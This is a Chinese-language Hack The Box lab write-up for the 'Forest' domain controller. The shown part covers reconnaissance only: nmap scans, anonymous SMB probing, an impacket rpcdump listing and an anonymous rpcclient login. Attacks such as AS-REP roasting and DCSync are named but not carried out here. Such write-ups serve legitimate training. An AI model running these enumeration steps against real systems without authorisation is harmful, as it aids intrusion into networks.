forest-htb-writeup

0x00 靶场技能介绍

章节技能：RPC 服务及其对应的端口枚举、RPC匿名登录、ldap协议枚举、AS-REProast攻击、winPEASx64.exe工具枚举、BloodHound信息收集、DCSync攻击

参考链接：https://xdann1.github.io/posts/writeup-forest/

参考链接：https://myhomeisquintoc.com/challenge/forest

0x01 用户权限获取

1、获取下靶机地址：10.10.10.161

2、使用nmap对靶机扫描下开放端口情况

┌─[us-vip-22]─[10.10.14.5]─[htb-shiyan@htb-b3h4uwg3h4]─[~/Desktop]
└──╼ [★]$ sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.10.161 -oG allPorts

Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE        REASON
53/tcp    open  domain         syn-ack ttl 127
88/tcp    open  kerberos-sec   syn-ack ttl 127
135/tcp   open  msrpc          syn-ack ttl 127
139/tcp   open  netbios-ssn    syn-ack ttl 127
389/tcp   open  ldap           syn-ack ttl 127
445/tcp   open  microsoft-ds   syn-ack ttl 127
464/tcp   open  kpasswd5       syn-ack ttl 127
593/tcp   open  http-rpc-epmap syn-ack ttl 127
636/tcp   open  ldapssl        syn-ack ttl 127
49664/tcp open  unknown        syn-ack ttl 127
49666/tcp open  unknown        syn-ack ttl 127
49667/tcp open  unknown        syn-ack ttl 127
49676/tcp open  unknown        syn-ack ttl 127

参数说明：

-p-->扫描所有端口（65535）
–open->仅显示处于“开放”状态的端口
-sS->应用 TCP SYN 扫描
--min-rate 5000 -->表示我希望发送的数据包速度不低于每秒 5000 个数据包
-vvv->当发现信息时在屏幕上显示信息
-n->表示不应用DNS解析
-Pn->表示不应用ARP协议
10.10.10.161->要扫描的IP地址
-oG allPorts ->将输出导出到名为“allPorts”的 grpeable 文件

3、扫描下具体端口的版本信息和漏洞信息

┌─[us-vip-22]─[10.10.14.5]─[htb-shiyan@htb-b3h4uwg3h4]─[~/Desktop]
└──╼ [★]$ sudo nmap -p53,88,135,139,445,464,593,9389,47001,49671,49677,49684,49703,49921 -sC -sV 10.10.10.161 -oN targeted

PORT      STATE  SERVICE      VERSION
53/tcp    open   domain       Simple DNS Plus
88/tcp    open   kerberos-sec Microsoft Windows Kerberos (server time: 2023-12-18 15:06:56Z)
135/tcp   open   msrpc        Microsoft Windows RPC
139/tcp   open   netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open   microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http   Microsoft Windows RPC over HTTP 1.0
9389/tcp  open   mc-nmf       .NET Message Framing
47001/tcp open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49671/tcp open   msrpc        Microsoft Windows RPC
49677/tcp open   msrpc        Microsoft Windows RPC
49684/tcp open   msrpc        Microsoft Windows RPC
49703/tcp open   msrpc        Microsoft Windows RPC
49921/tcp closed unknown
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h46m49s, deviation: 4h37m08s, median: 6m48s
| smb2-time: 
|   date: 2023-12-18T15:07:48
|_  start_date: 2023-12-18T14:41:59
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2023-12-18T07:07:45-08:00

参数说明：

-p53,88,135,139,445,464,593,9389,47001,49671,49677,49684,49703,49921->表示您要扫描的端口
-sC->启动基本枚举脚本
-sV->列出端口上运行的版本和服务
10.10.10.161->要扫描的IP地址
-oN 目标->将输出导出到 nmap 格式的文件，名称为"targeted"

4、开始逐步进行枚举操作，知识点开始来了。。。

5、53端口：我们尝试向服务器查询进行反向查找（FAIL）

dig -x <IP> @<SERVER_TO_QUERY>

┌─[us-vip-22]─[10.10.14.5]─[htb-shiyan@htb-b3h4uwg3h4]─[~/Desktop]
└──╼ [★]$ dig -x 10.10.10.161 @10.10.10.161
;; communications error to 10.10.10.161#53: timed out
;; communications error to 10.10.10.161#53: timed out
;; communications error to 10.10.10.161#53: timed out

; <<>> DiG 9.18.12-1~bpo11+1-Debian <<>> -x 10.10.10.161 @10.10.10.161
;; global options: +cmd
;; no servers could be reached

6、把 nmap 脚本扫描中 smb-os-discovery 的发现的域名信息加入到本地hosts中

┌─[us-vip-22]─[10.10.14.5]─[htb-shiyan@htb-b3h4uwg3h4]─[~/Desktop]
└──╼ [★]$ echo "10.10.10.161 htb.local" | sudo tee -a /etc/hosts
10.10.10.161 htb.local

7、445端口：尝试匿名访问smb服务，查看是否可以访问（FAIL）

crackmapexec

┌─[us-vip-22]─[10.10.14.5]─[htb-shiyan@htb-b3h4uwg3h4]─[~/Desktop]
└──╼ [★]$ crackmapexec smb 10.10.10.161
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing FTP protocol database
[*] Initializing MSSQL protocol database
[*] Initializing WINRM protocol database
[*] Initializing LDAP protocol database
[*] Initializing RDP protocol database
[*] Initializing SSH protocol database
[*] Initializing SMB protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)

smbclient

┌─[us-vip-22]─[10.10.14.5]─[htb-shiyan@htb-b3h4uwg3h4]─[~/Desktop]
└──╼ [★]$ smbclient -L 10.10.10.161 -N
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available

smbmap

┌─[us-vip-22]─[10.10.14.5]─[htb-shiyan@htb-b3h4uwg3h4]─[~/Desktop]
└──╼ [★]$ smbmap -H 10.10.10.161
[+] IP: 10.10.10.161:445	Name: 10.10.10.161 

8、135端口：通过rpc协议来获取系统自身的一些信息（WIN）

rpcdump.py [-debug] [-target-ip <IP>] [-port 135|139|443|445|593] [-hashes <LMHASH>:<NTHASH>] [[<DOMAIN>/]<USERNAME>[:<PASSWORD>]@]<TARGETNAME>

┌─[us-vip-22]─[10.10.14.5]─[htb-shiyan@htb-b3h4uwg3h4]─[~/Desktop]
└──╼ [★]$ impacket-rpcdump -port 135 10.10.10.161
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[*] Retrieving endpoint list from 10.10.10.161
Protocol: [MS-RSP]: Remote Shutdown Protocol 
Provider: wininit.exe 
UUID    : D95AFE70-A6D5-4259-822E-2C84DA1DDB0D v1.0 
Bindings: 
          ncacn_ip_tcp:10.10.10.161[49664]
          ncalrpc:[WindowsShutdown]
          ncacn_np:\\FOREST[\PIPE\InitShutdown]
          ncalrpc:[WMsgKRpc06FB10]

Protocol: N/A 
Provider: winlogon.exe 
UUID    : 76F226C3-EC14-4325-8A99-6A46348418AF v1.0 
Bindings: 
          ncalrpc:[WindowsShutdown]
          ncacn_np:\\FOREST[\PIPE\InitShutdown]
          ncalrpc:[WMsgKRpc06FB10]
          ncalrpc:[WMsgKRpc073731]

Protocol: N/A 
Provider: N/A 
UUID    : D09BDEB5-6171-4A34-BFE2-06FA82652568 v1.0 
Bindings: 
          ncalrpc:[csebpub]
          ncalrpc:[LRPC-74ac5392d6df54b7e5]
          ncalrpc:[LRPC-fde271b843012cd841]
          ncacn_np:\\FOREST[\pipe\LSM_API_service]
          ncalrpc:[LSMApi]
          ncalrpc:[LRPC-4590f384e58fc72d6b]
          ncalrpc:[actkernel]
          ncalrpc:[umpo]
          ncalrpc:[LRPC-fde271b843012cd841]
          ncacn_np:\\FOREST[\pipe\LSM_API_service]
          ncalrpc:[LSMApi]
          ncalrpc:[LRPC-4590f384e58fc72d6b]
          ncalrpc:[actkernel]
          ncalrpc:[umpo]
          ncalrpc:[LRPC-a38a21ad2136dc216e]
          ncacn_ip_tcp:10.10.10.161[49665]
          ncacn_np:\\FOREST[\pipe\eventlog]
          ncalrpc:[eventlog]
          ncalrpc:[dhcpcsvc6]
          ncalrpc:[dhcpcsvc]
          ncalrpc:[LRPC-708b20b5be4dc17c83]

Protocol: N/A 
Provider: N/A 
UUID    : 697DCDA9-3BA9-4EB2-9247-E11F1901B0D2 v1.0 
Bindings: 
          ncalrpc:[LRPC-74ac5392d6df54b7e5]
          ncalrpc:[LRPC-fde271b843012cd841]
          ncacn_np:\\FOREST[\pipe\LSM_API_service]
          ncalrpc:[LSMApi]
          ncalrpc:[LRPC-4590f384e58fc72d6b]
          ncalrpc:[actkernel]
          ncalrpc:[umpo]

Protocol: N/A 
Provider: sysntfy.dll 
UUID    : C9AC6DB5-82B7-4E55-AE8A-E464ED7B4277 v1.0 Impl friendly name
Bindings: 
          ncalrpc:[LRPC-4590f384e58fc72d6b]
          ncalrpc:[actkernel]
          ncalrpc:[umpo]
          ncalrpc:[senssvc]
          ncalrpc:[OLEE9F05356831948CD4D8E9C369959]
          ncalrpc:[IUserProfile2]
          ncalrpc:[OLEE9F05356831948CD4D8E9C369959]
          ncalrpc:[IUserProfile2]
          ncalrpc:[IUserProfile2]
          ncalrpc:[OLE5FFAE35BFEF151EC54CCE574083C]
          ncacn_ip_tcp:10.10.10.161[49667]
          ncalrpc:[samss lpc]
          ncalrpc:[SidKey Local End Point]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSA_EAS_ENDPOINT]
          ncalrpc:[lsacap]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncacn_np:\\FOREST[\pipe\lsass]

Protocol: N/A 
Provider: N/A 
UUID    : 3473DD4D-2E88-4006-9CBA-22570909DD10 v5.1 WinHttp Auto-Proxy Service
Bindings: 
          ncalrpc:[OLE9B8E05F6FB105569B74ED25AF8F6]
          ncalrpc:[LRPC-ebdb7a546ba62e5e06]

Protocol: N/A 
Provider: nsisvc.dll 
UUID    : 7EA70BCF-48AF-4F6A-8968-6A440754D5FA v1.0 NSI server endpoint
Bindings: 
          ncalrpc:[LRPC-ebdb7a546ba62e5e06]

Protocol: N/A 
Provider: N/A 
UUID    : A500D4C6-0DD1-4543-BC0C-D5F93486EAF8 v1.0 
Bindings: 
          ncalrpc:[LRPC-03c220041a025669d2]
          ncalrpc:[LRPC-a38a21ad2136dc216e]
          ncacn_ip_tcp:10.10.10.161[49665]
          ncacn_np:\\FOREST[\pipe\eventlog]
          ncalrpc:[eventlog]
          ncalrpc:[dhcpcsvc6]
          ncalrpc:[dhcpcsvc]
          ncalrpc:[LRPC-708b20b5be4dc17c83]

Protocol: [MS-EVEN6]: EventLog Remoting Protocol 
Provider: wevtsvc.dll 
UUID    : F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C v1.0 Event log TCPIP
Bindings: 
          ncacn_ip_tcp:10.10.10.161[49665]
          ncacn_np:\\FOREST[\pipe\eventlog]
          ncalrpc:[eventlog]
          ncalrpc:[dhcpcsvc6]
          ncalrpc:[dhcpcsvc]
          ncalrpc:[LRPC-708b20b5be4dc17c83]

Protocol: N/A 
Provider: dhcpcsvc6.dll 
UUID    : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D6 v1.0 DHCPv6 Client LRPC Endpoint
Bindings: 
          ncalrpc:[dhcpcsvc6]
          ncalrpc:[dhcpcsvc]
          ncalrpc:[LRPC-708b20b5be4dc17c83]

Protocol: N/A 
Provider: dhcpcsvc.dll 
UUID    : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D5 v1.0 DHCP Client LRPC Endpoint
Bindings: 
          ncalrpc:[dhcpcsvc]
          ncalrpc:[LRPC-708b20b5be4dc17c83]

Protocol: N/A 
Provider: nrpsrv.dll 
UUID    : 30ADC50C-5CBC-46CE-9A0E-91914789E23C v1.0 NRP server endpoint
Bindings: 
          ncalrpc:[LRPC-708b20b5be4dc17c83]

Protocol: N/A 
Provider: IKEEXT.DLL 
UUID    : A398E520-D59A-4BDD-AA7A-3C1E0303A511 v1.0 IKE/Authip API
Bindings: 
          ncalrpc:[LRPC-ce2adf4f81ea4d4243]
          ncacn_ip_tcp:10.10.10.161[49666]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\FOREST[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLEE9F05356831948CD4D8E9C369959]
          ncalrpc:[IUserProfile2]

Protocol: N/A 
Provider: N/A 
UUID    : C49A5A70-8A7F-4E70-BA16-1E8F1F193EF1 v1.0 Adh APIs
Bindings: 
          ncalrpc:[LRPC-ce2adf4f81ea4d4243]
          ncacn_ip_tcp:10.10.10.161[49666]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\FOREST[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLEE9F05356831948CD4D8E9C369959]
          ncalrpc:[IUserProfile2]

Protocol: N/A 
Provider: N/A 
UUID    : C36BE077-E14B-4FE9-8ABC-E856EF4F048B v1.0 Proxy Manager client server endpoint
Bindings: 
          ncalrpc:[LRPC-ce2adf4f81ea4d4243]
          ncacn_ip_tcp:10.10.10.161[49666]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\FOREST[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLEE9F05356831948CD4D8E9C369959]
          ncalrpc:[IUserProfile2]

Protocol: N/A 
Provider: N/A 
UUID    : 2E6035B2-E8F1-41A7-A044-656B439C4C34 v1.0 Proxy Manager provider server endpoint
Bindings: 
          ncalrpc:[LRPC-ce2adf4f81ea4d4243]
          ncacn_ip_tcp:10.10.10.161[49666]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\FOREST[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLEE9F05356831948CD4D8E9C369959]
          ncalrpc:[IUserProfile2]

Protocol: N/A 
Provider: iphlpsvc.dll 
UUID    : 552D076A-CB29-4E44-8B6A-D15E59E2C0AF v1.0 IP Transition Configuration endpoint
Bindings: 
          ncalrpc:[LRPC-ce2adf4f81ea4d4243]
          ncacn_ip_tcp:10.10.10.161[49666]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\FOREST[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLEE9F05356831948CD4D8E9C369959]
          ncalrpc:[IUserProfile2]

Protocol: N/A 
Provider: N/A 
UUID    : 0D3C7F20-1C8D-4654-A1B3-51563B298BDA v1.0 UserMgrCli
Bindings: 
          ncalrpc:[LRPC-ce2adf4f81ea4d4243]
          ncacn_ip_tcp:10.10.10.161[49666]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\FOREST[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLEE9F05356831948CD4D8E9C369959]
          ncalrpc:[IUserProfile2]

Protocol: N/A 
Provider: N/A 
UUID    : B18FBAB6-56F8-4702-84E0-41053293A869 v1.0 UserMgrCli
Bindings: 
          ncalrpc:[LRPC-ce2adf4f81ea4d4243]
          ncacn_ip_tcp:10.10.10.161[49666]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\FOREST[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLEE9F05356831948CD4D8E9C369959]
          ncalrpc:[IUserProfile2]

Protocol: N/A 
Provider: N/A 
UUID    : 3A9EF155-691D-4449-8D05-09AD57031823 v1.0 
Bindings: 
          ncacn_ip_tcp:10.10.10.161[49666]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\FOREST[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLEE9F05356831948CD4D8E9C369959]
          ncalrpc:[IUserProfile2]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol 
Provider: schedsvc.dll 
UUID    : 86D35949-83C9-4044-B424-DB363231FD0C v1.0 
Bindings: 
          ncacn_ip_tcp:10.10.10.161[49666]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\FOREST[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLEE9F05356831948CD4D8E9C369959]
          ncalrpc:[IUserProfile2]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol 
Provider: taskcomp.dll 
UUID    : 378E52B0-C0A9-11CF-822D-00AA0051E40F v1.0 
Bindings: 
          ncacn_np:\\FOREST[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLEE9F05356831948CD4D8E9C369959]
          ncalrpc:[IUserProfile2]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol 
Provider: taskcomp.dll 
UUID    : 1FF70682-0A51-30E8-076D-740BE8CEE98B v1.0 
Bindings: 
          ncacn_np:\\FOREST[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLEE9F05356831948CD4D8E9C369959]
          ncalrpc:[IUserProfile2]

Protocol: N/A 
Provider: schedsvc.dll 
UUID    : 0A74EF1C-41A4-4E06-83AE-DC74FB1CDD53 v1.0 
Bindings: 
          ncalrpc:[senssvc]
          ncalrpc:[OLEE9F05356831948CD4D8E9C369959]
          ncalrpc:[IUserProfile2]

Protocol: N/A 
Provider: gpsvc.dll 
UUID    : 2EB08E3E-639F-4FBA-97B1-14F878961076 v1.0 Group Policy RPC Interface
Bindings: 
          ncalrpc:[LRPC-4774dd312b11382d12]

Protocol: N/A 
Provider: N/A 
UUID    : 7F1343FE-50A9-4927-A778-0C5859517BAC v1.0 DfsDs service
Bindings: 
          ncacn_np:\\FOREST[\PIPE\wkssvc]
          ncalrpc:[LRPC-421d103bf910dfcf55]
          ncalrpc:[DNSResolver]

Protocol: N/A 
Provider: N/A 
UUID    : EB081A0D-10EE-478A-A1DD-50995283E7A8 v3.0 Witness Client Test Interface
Bindings: 
          ncalrpc:[LRPC-421d103bf910dfcf55]
          ncalrpc:[DNSResolver]

Protocol: N/A 
Provider: N/A 
UUID    : F2C9B409-C1C9-4100-8639-D8AB1486694A v1.0 Witness Client Upcall Server
Bindings: 
          ncalrpc:[LRPC-421d103bf910dfcf55]
          ncalrpc:[DNSResolver]

Protocol: N/A 
Provider: N/A 
UUID    : DF4DF73A-C52D-4E3A-8003-8437FDF8302A v0.0 WM_WindowManagerRPC\Server
Bindings: 
          ncalrpc:[LRPC-821170e6a95bcc359e]
          ncalrpc:[OLED30AC0AFE114D8A9BD1B2F1233CF]
          ncalrpc:[LRPC-2c8e3b8ce21ac50e86]
          ncalrpc:[LRPC-e4e3695259f1aee53a]

Protocol: N/A 
Provider: MPSSVC.dll 
UUID    : 2FB92682-6599-42DC-AE13-BD2CA89BD11C v1.0 Fw APIs
Bindings: 
          ncalrpc:[LRPC-2c8e3b8ce21ac50e86]
          ncalrpc:[LRPC-e4e3695259f1aee53a]

Protocol: N/A 
Provider: N/A 
UUID    : F47433C3-3E9D-4157-AAD4-83AA1F5C2D4C v1.0 Fw APIs
Bindings: 
          ncalrpc:[LRPC-2c8e3b8ce21ac50e86]
          ncalrpc:[LRPC-e4e3695259f1aee53a]

Protocol: N/A 
Provider: MPSSVC.dll 
UUID    : 7F9D11BF-7FB9-436B-A812-B2D50C5D4C03 v1.0 Fw APIs
Bindings: 
          ncalrpc:[LRPC-2c8e3b8ce21ac50e86]
          ncalrpc:[LRPC-e4e3695259f1aee53a]

Protocol: N/A 
Provider: BFE.DLL 
UUID    : DD490425-5325-4565-B774-7E27D6C09C24 v1.0 Base Firewall Engine API
Bindings: 
          ncalrpc:[LRPC-e4e3695259f1aee53a]

Protocol: [MS-FASP]: Firewall and Advanced Security Protocol 
Provider: FwRemoteSvr.dll 
UUID    : 6B5BDD1E-528C-422C-AF8C-A4079BE4FE48 v1.0 Remote Fw APIs
Bindings: 
          ncacn_ip_tcp:10.10.10.161[49671]
          ncalrpc:[ipsec]

Protocol: N/A 
Provider: efssvc.dll 
UUID    : 04EEB297-CBF4-466B-8A2A-BFD6A2F10BBA v1.0 EFSK RPC Interface
Bindings: 
          ncacn_np:\\FOREST[\pipe\efsrpc]
          ncalrpc:[LRPC-f54f3b860d14d3cacd]

Protocol: N/A 
Provider: efssvc.dll 
UUID    : DF1941C5-FE89-4E79-BF10-463657ACF44D v1.0 EFS RPC Interface
Bindings: 
          ncacn_np:\\FOREST[\pipe\efsrpc]
          ncalrpc:[LRPC-f54f3b860d14d3cacd]

Protocol: [MS-NRPC]: Netlogon Remote Protocol 
Provider: netlogon.dll 
UUID    : 12345678-1234-ABCD-EF00-01234567CFFB v1.0 
Bindings: 
          ncalrpc:[NETLOGON_LRPC]
          ncacn_ip_tcp:10.10.10.161[49677]
          ncacn_np:\\FOREST[\pipe\32d936205dcbb3e0]
          ncacn_http:10.10.10.161[49676]
          ncalrpc:[NTDS_LPC]
          ncalrpc:[OLE5FFAE35BFEF151EC54CCE574083C]
          ncacn_ip_tcp:10.10.10.161[49667]
          ncalrpc:[samss lpc]
          ncalrpc:[SidKey Local End Point]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSA_EAS_ENDPOINT]
          ncalrpc:[lsacap]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncacn_np:\\FOREST[\pipe\lsass]

Protocol: [MS-RAA]: Remote Authorization API Protocol 
Provider: N/A 
UUID    : 0B1C2170-5732-4E0E-8CD3-D9B16F3B84D7 v0.0 RemoteAccessCheck
Bindings: 
          ncalrpc:[NETLOGON_LRPC]
          ncacn_ip_tcp:10.10.10.161[49677]
          ncacn_np:\\FOREST[\pipe\32d936205dcbb3e0]
          ncacn_http:10.10.10.161[49676]
          ncalrpc:[NTDS_LPC]
          ncalrpc:[OLE5FFAE35BFEF151EC54CCE574083C]
          ncacn_ip_tcp:10.10.10.161[49667]
          ncalrpc:[samss lpc]
          ncalrpc:[SidKey Local End Point]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSA_EAS_ENDPOINT]
          ncalrpc:[lsacap]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncacn_np:\\FOREST[\pipe\lsass]
          ncalrpc:[NETLOGON_LRPC]
          ncacn_ip_tcp:10.10.10.161[49677]
          ncacn_np:\\FOREST[\pipe\32d936205dcbb3e0]
          ncacn_http:10.10.10.161[49676]
          ncalrpc:[NTDS_LPC]
          ncalrpc:[OLE5FFAE35BFEF151EC54CCE574083C]
          ncacn_ip_tcp:10.10.10.161[49667]
          ncalrpc:[samss lpc]
          ncalrpc:[SidKey Local End Point]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSA_EAS_ENDPOINT]
          ncalrpc:[lsacap]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncacn_np:\\FOREST[\pipe\lsass]

Protocol: [MS-SAMR]: Security Account Manager (SAM) Remote Protocol 
Provider: samsrv.dll 
UUID    : 12345778-1234-ABCD-EF00-0123456789AC v1.0 
Bindings: 
          ncacn_ip_tcp:10.10.10.161[49677]
          ncacn_np:\\FOREST[\pipe\32d936205dcbb3e0]
          ncacn_http:10.10.10.161[49676]
          ncalrpc:[NTDS_LPC]
          ncalrpc:[OLE5FFAE35BFEF151EC54CCE574083C]
          ncacn_ip_tcp:10.10.10.161[49667]
          ncalrpc:[samss lpc]
          ncalrpc:[SidKey Local End Point]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSA_EAS_ENDPOINT]
          ncalrpc:[lsacap]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncacn_np:\\FOREST[\pipe\lsass]

Protocol: [MS-LSAT]: Local Security Authority (Translation Methods) Remote 
Provider: lsasrv.dll 
UUID    : 12345778-1234-ABCD-EF00-0123456789AB v0.0 
Bindings: 
          ncacn_np:\\FOREST[\pipe\32d936205dcbb3e0]
          ncacn_http:10.10.10.161[49676]
          ncalrpc:[NTDS_LPC]
          ncalrpc:[OLE5FFAE35BFEF151EC54CCE574083C]
          ncacn_ip_tcp:10.10.10.161[49667]
          ncalrpc:[samss lpc]
          ncalrpc:[SidKey Local End Point]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSA_EAS_ENDPOINT]
          ncalrpc:[lsacap]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncacn_np:\\FOREST[\pipe\lsass]

Protocol: [MS-NSPI]: Name Service Provider Interface (NSPI) Protocol 
Provider: ntdsai.dll 
UUID    : F5CC5A18-4264-101A-8C59-08002B2F8426 v56.0 MS NT Directory NSP Interface
Bindings: 
          ncacn_np:\\FOREST[\pipe\32d936205dcbb3e0]
          ncacn_http:10.10.10.161[49676]
          ncalrpc:[NTDS_LPC]
          ncalrpc:[OLE5FFAE35BFEF151EC54CCE574083C]
          ncacn_ip_tcp:10.10.10.161[49667]
          ncalrpc:[samss lpc]
          ncalrpc:[SidKey Local End Point]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSA_EAS_ENDPOINT]
          ncalrpc:[lsacap]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncacn_np:\\FOREST[\pipe\lsass]

Protocol: [MS-DRSR]: Directory Replication Service (DRS) Remote Protocol 
Provider: ntdsai.dll 
UUID    : E3514235-4B06-11D1-AB04-00C04FC2DCD2 v4.0 MS NT Directory DRS Interface
Bindings: 
          ncacn_np:\\FOREST[\pipe\32d936205dcbb3e0]
          ncacn_http:10.10.10.161[49676]
          ncalrpc:[NTDS_LPC]
          ncalrpc:[OLE5FFAE35BFEF151EC54CCE574083C]
          ncacn_ip_tcp:10.10.10.161[49667]
          ncalrpc:[samss lpc]
          ncalrpc:[SidKey Local End Point]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSA_EAS_ENDPOINT]
          ncalrpc:[lsacap]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncacn_np:\\FOREST[\pipe\lsass]

Protocol: N/A 
Provider: N/A 
UUID    : 1A0D010F-1C33-432C-B0F5-8CF4E8053099 v1.0 IdSegSrv service
Bindings: 
          ncalrpc:[LRPC-f9f419a0a4d68e62d4]

Protocol: N/A 
Provider: srvsvc.dll 
UUID    : 98716D03-89AC-44C7-BB8C-285824E51C4A v1.0 XactSrv service
Bindings: 
          ncalrpc:[LRPC-f9f419a0a4d68e62d4]

Protocol: N/A 
Provider: N/A 
UUID    : E38F5360-8572-473E-B696-1B46873BEEAB v1.0 
Bindings: 
          ncalrpc:[LRPC-7145eb44504ba2a7fe]

Protocol: N/A 
Provider: N/A 
UUID    : 4C9DBF19-D39E-4BB9-90EE-8F7179B20283 v1.0 
Bindings: 
          ncalrpc:[LRPC-7145eb44504ba2a7fe]

Protocol: [MS-CMPO]: MSDTC Connection Manager: 
Provider: msdtcprx.dll 
UUID    : 906B0CE0-C70B-1067-B317-00DD010662DA v1.0 
Bindings: 
          ncalrpc:[LRPC-96c060af3de482b932]
          ncalrpc:[OLE857628ECE30720DDECFF4AFC527D]
          ncalrpc:[LRPC-9f632ddadc24b2b9bb]
          ncalrpc:[LRPC-9f632ddadc24b2b9bb]
          ncalrpc:[LRPC-9f632ddadc24b2b9bb]

Protocol: [MS-SCMR]: Service Control Manager Remote Protocol 
Provider: services.exe 
UUID    : 367ABB81-9844-35F1-AD32-98F038001003 v2.0 
Bindings: 
          ncacn_ip_tcp:10.10.10.161[49684]

Protocol: N/A 
Provider: N/A 
UUID    : F3F09FFD-FBCF-4291-944D-70AD6E0E73BB v1.0 
Bindings: 
          ncalrpc:[LRPC-c4d32e7aadedc56f49]

Protocol: [MS-DNSP]: Domain Name Service (DNS) Server Management 
Provider: dns.exe 
UUID    : 50ABC2A4-574D-40B3-9D66-EE4FD5FBA076 v5.0 
Bindings: 
          ncacn_ip_tcp:10.10.10.161[49703]

Protocol: [MS-FRS2]: Distributed File System Replication Protocol 
Provider: dfsrmig.exe 
UUID    : 897E2E5F-93F3-4376-9C9C-FD2277495C27 v1.0 Frs2 Service
Bindings: 
          ncacn_ip_tcp:10.10.10.161[49920]
          ncalrpc:[OLE30CF6E7ABC9E5C955A124A940C63]

[*] Received 311 endpoints.

9、尝试135端口rpc服务是否开启匿名访问

rpcclient -U "" -N <IP>

┌─[us-vip-22]─[10.10.14.5]─[htb-shiyan@htb-b3h4uwg3h4]─[~/Desktop]
└──╼ [★]$ rpcclient -U "" -N 10.10.10.161
rpcclient $> getusername
Account Name: ANONYMOUS LOGON, Authority Name: NT AUTHORITY
rpcclient $>

10、一旦可以匿名用户身份登录，我们就可以执行一些 RPC 函数。我们没有执行所有这些操作的正确权限，但有些操作会给我们提供有关目录的有趣信息。

11、在这个靶机中，我们有权调用SAMR（安全帐户管理器远程协议）下的某些函数：enumdomains、enumdomusers、querydominfo、enumdomgroups

enumdomains

rpcclient $> enumdomains
name:[HTB] idx:[0x0]
